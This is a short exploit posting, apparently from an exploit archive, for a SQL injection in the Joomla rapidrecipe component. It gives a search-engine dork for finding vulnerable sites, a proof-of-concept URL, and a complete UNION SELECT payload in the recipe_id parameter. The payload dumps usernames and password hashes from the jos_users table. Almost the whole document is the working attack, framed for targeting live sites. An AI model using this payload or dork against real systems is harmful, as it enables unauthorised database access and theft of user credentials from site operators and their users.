id: 3132
date: 06/07/2008
title: Joomla Component rapidrecipe Remote SQL injection Vulnerability
author: His0k4
cves: 

===============================================================
Joomla Component rapidrecipe Remote SQL injection Vulnerability
===============================================================



/---------------------------------------------------------------\
\                                				/
/       Joomla Component rapidrecipe Remote SQL injection       \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com_rapidrecipe "recipe_id"

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

                
----------------------------------------------------------------------------




#  0day.today [2023-03-27]  #